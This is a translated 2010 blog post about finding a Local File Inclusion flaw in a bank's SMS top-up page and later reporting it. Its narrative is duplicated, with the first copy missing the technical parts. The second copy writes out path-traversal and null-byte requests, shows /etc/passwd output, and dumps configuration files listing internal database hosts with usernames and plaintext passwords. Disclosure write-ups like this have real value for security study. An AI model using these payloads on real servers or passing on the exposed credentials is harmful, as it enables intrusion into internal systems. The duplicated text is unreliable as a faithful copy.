March 4, 2010 at 16:23The story of one penetration
Topics about catching hackers made me write this post.
I want to share with you the story that happened to me a few years ago.
I must say right away that my hobby is web application security.
Accidentally walking on the Internet, my friend found a site to send free SMS to numbers of Ukrainian operators. There we found a small vulnerability related to bypassing the Turing test (captcha).
Since my friend and I like to look for vulnerabilities, we played a game with the meaning of which of us will quickly bypass captcha.
But today the story is not about this, but about what was discovered by us later.
One day, my friend, looking at the source code of a site page to send free sms, discovered an interesting HTML code:
The link that logically should download the file to the computer was very interesting for us.
In less than 5 minutes, we discovered the Local File Inclusion
vulnerability. The vulnerability was in the following link:
Using this vulnerability, you can read local files directly in the browser.
We made a request to the server for a nonexistent file, and here's what we got:
Request for url:
The server response was something like this:
Honestly, I heard about Resin for the first time.
And Resin is a high-performance application server that includes such features as scalability and load balancing.
Product information that we managed to find out on Wikipedia at that time: After downloading this software, we started to study it. And so, the Resin software folder structure:
Now let's get back to vulnerability.
Let's start with the classics: Using the
link hackbank.ua/test?xslt_url=../../../../../../etc/passwd
we get the following conclusion:
Then we started looking for where the Resin server's / conf folder is locally stored. And we found it, pretty quickly. A config is an XML file. Which was available at hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00
Next, we look at the source code of the resulting file.
Here are all the web server logs:
We did not find anything interesting there. But we went further :)
File ../../../../../../conf/c2b-db-pool.xml%00 :
File ../../../../../../conf/db-pool.xml%00 :
Guess what it is? That's right, this is access to other servers of the bank’s internal network :)
The next day, we wrote a letter, described all the vulnerabilities that we managed to find. And they sent a letter to the bank's mail. After 3 weeks, vulnerabilities were present. We sent the letter again, and a week later, to the joy of repairing our vulnerabilities.
With this article we did not want to offend anyone, we just want to inform the world that there are no secure systems. Hire professionals to audit your information systems.
For all questions, please contact vadim@g-sg.net
Thanks for attention!
UPD Write all errors in the text to private messages. Thanks!
I want to share with you the story that happened to me a few years ago.
I must say right away that my hobby is web application security.
Accidentally walking on the Internet, my friend found a site to send free SMS to numbers of Ukrainian operators. There we found a small vulnerability related to bypassing the Turing test (captcha).
Since my friend and I like to look for vulnerabilities, we played a game with the meaning of which of us will quickly bypass captcha.
But today the story is not about this, but about what was discovered by us later.
One day, my friend, looking at the source code of a site page to send free sms, discovered an interesting HTML code:
HREF="#" onClick="javascript:window.open('https://hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=service_host.xsl', ' 'quickpay','toolbar=0,status=0,menubar=0,scrollbars=0,width=650,height=400',false);" CLASS="header"> SRC="www.sms1.ua/img/topupeasy.jpg" WIDTH="82"
HEIGHT="34" ALT="Пополняй легко!" BORDER="0" VSPACE="0">
The link that logically should download the file to the computer was very interesting for us.
In less than 5 minutes, we discovered the Local File Inclusion
vulnerability. The vulnerability was in the following link:
hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=_file>
Using this vulnerability, you can read local files directly in the browser.
We made a request to the server for a nonexistent file, and here's what we got:
Request for url:
hackbank.ua/test?&xslt_url=0
The server response was something like this:
500 Servlet Exception
...........................
Resin-3.0.s060216 (built Thu, 16 Feb 2006 09:17:50 PST)
Honestly, I heard about Resin for the first time.
And Resin is a high-performance application server that includes such features as scalability and load balancing.
Product information that we managed to find out on Wikipedia at that time: After downloading this software, we started to study it. And so, the Resin software folder structure:
Логотип компании Caucho Technology, Inc.
Тип Сервер приложений
Разработчик Caucho Technology, Inc.
ОС Кроссплатформенное программное обеспечение
Текущая версия 3.1.1 — май 2007
Лицензия GPL Собственническое ПО
Сайт www.caucho.com (англ.)
Информация в Википедии
¦ configure
¦ httpd.exe
¦ LICENSE
¦ Makefile.in
¦ README
¦ setup.exe
¦
+---automake
¦ config.guess
¦ config.sub
¦ install-sh
¦ ltmain.sh
¦ missing
¦
+---bin
¦ httpd.sh
¦
+---conf
¦ app-default.xml
¦ development.conf
¦ fine.conf
¦ minimal.conf
¦ password.xml
¦ resin-3_1.conf
¦ resin-admin.xml
¦ resin.conf
¦
+---contrib
¦ init.resin-iptables
¦ init.resin.in
¦
+---lib
¦ activation.jar
¦ eclipse-compil
Now let's get back to vulnerability.
Let's start with the classics: Using the
link hackbank.ua/test?xslt_url=../../../../../../etc/passwd
we get the following conclusion:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Servic
Then we started looking for where the Resin server's / conf folder is locally stored. And we found it, pretty quickly. A config is an XML file. Which was available at hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00
% 00 is null-byte , tells the web server that this is the end of the line.
Next, we look at the source code of the resulting file.
xmlns:resin="caucho.com/ns/resin/core" xmlns="caucho.com/ns/resin">
port="1080"/>
port="10443">
id="" root-directory=".">
path="log/access.log" format="%h %l %u %t "%r" %s %b "%i" "%i"" rollover-period="1W"/>
path="log/stderr.log" timestamp="[%Y.%m.%d %H:%M:%S.%s] " rollover-period="1W"/>
path="log/stdout.log" rollover-period="1W"/>
path="log/server.log" timestamp="[%Y.%m.%d %H:%M:%S.%s] " rollover-period="1W"/>
id="/" document-directory="webapps/ROOT"/>
path="deploy">
ejb-server-jndi-name="java:comp/env/ejb">
jndi-name="java:comp/env/ejb"/>
path="webapps"/>
path="deploy"/>
path="deploy"/>
path="$/conf/db-pool.xml"/>
path="$/conf/c2b-db-pool.xml"/>
path="$/conf/db-pool-qp.xml"/>
path="$/conf/hb-default.xml"/>
path="$/conf/resin-status.xml"/>
path="$/conf/resin-common.xml"/>
Here are all the web server logs:
hackbank.ua/test?xslt_url=../../../../../../log/access.log
hackbank.ua/test?xslt_url=../../../../../../log/stderr.log
hackbank.ua/test?xslt_url=../../../../../../log/server.log
We did not find anything interesting there. But we went further :)
File ../../../../../../conf/c2b-db-pool.xml%00 :
10.1.101.195:5000
-----------------
user : C2BServer
password : vsirfysy
10.1.100.105:5000
-----------------
user : C2BServer
password : lfktrbq,thtu
10.1.100.115:5000
----------------
user : jbkl
password :123456
File ../../../../../../conf/db-pool.xml%00 :
10.1.101.51:5000
-------------------
user : е16_jag
password : u4BKoc7U5Edo
10.1.100.77:5000
-------------------
user : hskl
password : hsklhskl
10.1.99.49:4100
------------------
user : wbpfo_p424
password : aUKlOfcvT4YmAnk
10.1.99.82:5000
------------------
user : P24CVC
password : Login_4_P424CVC
Guess what it is? That's right, this is access to other servers of the bank’s internal network :)
The next day, we wrote a letter, described all the vulnerabilities that we managed to find. And they sent a letter to the bank's mail. After 3 weeks, vulnerabilities were present. We sent the letter again, and a week later, to the joy of repairing our vulnerabilities.
With this article we did not want to offend anyone, we just want to inform the world that there are no secure systems. Hire professionals to audit your information systems.
For all questions, please contact vadim@g-sg.net
* Attention! All links, as well as the name of the bank, were changed for reasons of anonymity *
Thanks for attention!
UPD Write all errors in the text to private messages. Thanks!